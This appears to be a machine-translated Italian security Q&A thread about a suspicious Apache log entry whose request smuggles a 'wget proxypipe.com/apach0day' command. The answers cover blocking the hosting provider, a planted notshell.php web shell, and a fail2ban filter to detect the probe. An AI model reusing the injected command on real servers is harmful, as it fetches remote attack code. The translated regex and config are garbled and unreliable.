Log di Apache, registrazione sospetta apach0day

4

oggi ho ricevuto questo

16X.XXX.XX.77 - - [28/Jul/2014:--:--:--] "GET /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSpart3dns;wget%20proxypipe.com/apach0day; HTTP/1.0" 200 3596 "-" "chroot-apach0day"

quindi con

HTTP_USER_AGENT: chroot-apach0day
REQUEST_URI: x0a/x04/x0a/x02/x06/x08/x09/cDDOSpart3dns;wget%20proxypipe.com/apach0day

viene visualizzato nel registro di accesso e sembra sospetto ... qualche idea al riguardo?

    
posta ptx 28.07.2014 - 21:28
fonte

3 risposte

3

Proxypipe.com è ospitato da Voxility S.R.L (AS39743) (AS3223). La voxility è nota per essere una pessima società di hosting, consentendo l'hosting di malware, l'invio di spam, l'esecuzione di DDoS et cetera dai loro IP.

È meglio bloccare tutti i loro intervalli IP altrimenti potresti avere a che fare con attacchi DDoS. L'ho vissuto tutto il giorno molto prima.

Puoi trovare un elenco dei loro intervalli IP qui Voxility (AS39743) e Voxility (AS3223)

    
risposta data 29.07.2014 - 03:02
fonte
1

Anch'io ho avuto sonde simili. Tuttavia, ho ottenuto tre sonde diverse, tutte con carichi utili diversi. L'esecuzione di ls -a mostrava una nuova directory chiamata .ssh nella mia root dei documenti, con un file chiamato notshell.php

Ho eliminato immediatamente la directory e distrutto l'istanza DigitalOcean

La mia ipotesi è che qualcuno stia tentando di creare una sorta di attacco ai server

    
risposta data 29.07.2014 - 02:46
fonte
0

Ecco una soluzione rapida e sporca per bloccare l'utilizzo di fail2ban. (Se al momento non utilizzi fail2ban, google per il tuo sistema operativo.)

Se hai installato fail2ban, vedi sotto. Le posizioni delle note dei file fail2ban potrebbero essere diverse, a seconda del sistema operativo. L'esempio sotto è da un server Debian. Questo esempio non copre i tempi di divieto, ecc .--- solo come creare un filtro e aggiungerlo a jail.local. Ci sono molti esempi di configurazione fail2ban su google per più sistemi.

Quick-And-Dirty (Debian Linux):

1) Crea un nuovo file apache-0day.conf in /etc/fail2ban/filter.d che contiene:

# Fail2Ban file di configurazione
# Filtro limitato per bloccare gli attacchi apach0day

[Definizione]
Opzione: failregex
# Note: regex per abbinare questo tipo di richiesta:
# 162.253.66.77 - - [28 / Jul / 2014: 19: 02: 00 +0000] "GET /? x0a / x04 / x0a / x02 / x06 / x08 / x09 / cDDOSpart3dns; wget% 20proxypipe.com / apach0day; HTTP / 1.0 "200 359" - "" chroot-apach0day "

failregex = ^ -. "(GET | POST). \ ?. proxypipe | apach0day. $
Opzione: ignoreregex
Note: regex per ignorare. Se questa regex corrisponde, la linea viene ignorata.

Valori: TEXT

# ignoreregex =

2) Filtro di prova con comando: fail2ban-regex /var/log/apache2/access.log /etc/fail2ban/filter.d/apache-0day.conf

3) Modifica /etc/fail2banl/jail.local, per aggiungere questo jail:

[apache-0 giorni]
abilitato = true port = http, https
filter = apache-0day
logpath = /var/log/apache*/*access.log
maxretry = 2

4) Test della nuova configurazione generale (attenzione per AVVISO e correzione, se necessario): fail2ban-client -d

5) Riavvia fail2ban: /etc/init.d/fail2ban restart

    
risposta data 29.07.2014 - 04:16
fonte

Leggi altre domande sui tag